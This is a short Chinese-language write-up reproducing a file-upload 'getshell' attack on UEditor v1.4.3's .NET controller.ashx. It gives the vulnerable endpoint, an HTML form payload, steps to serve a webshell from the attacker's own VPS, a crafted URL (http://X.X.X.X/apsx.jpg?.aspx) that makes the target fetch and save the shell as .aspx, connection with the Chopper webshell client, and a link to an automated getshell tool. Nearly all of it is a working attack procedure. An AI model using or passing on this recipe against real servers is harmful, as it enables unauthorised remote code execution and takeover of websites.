ueditor(v1.4.3)文件上传getshell实战复现

漏洞存在点：

http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8

 

漏洞原因：controller.ashx文件下只校验ContentType而没校验文件后缀导致getshell。

payload如下，并保存为html格式

<form action="http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"enctype="application/x-www-form-urlencoded"  method="POST">
    shell addr: <input type="text" name="source[]" />
                <input type="submit" value="Submit" />
</form>

 在自己的VPS上启动一个简易的HTTP服务，并传马(可以不用图片马，直接改后缀名为jpg)

python -m SimpleHTTPServer 80

访问自己的VPS即可看见服务已经启动。

打开上面含payload的html文件

 然后文本框中添加下面的链接，X.X.X.X是VPS地址

http://X.X.X.X/apsx.jpg?.aspx

 点击提交

 菜刀连接

服务器这边的记录

 

另外附上GETSHELL的工具：https://github.com/theLSA/ueditor-getshell

还附上最近大佬的分析链接：https://xz.aliyun.com/t/8488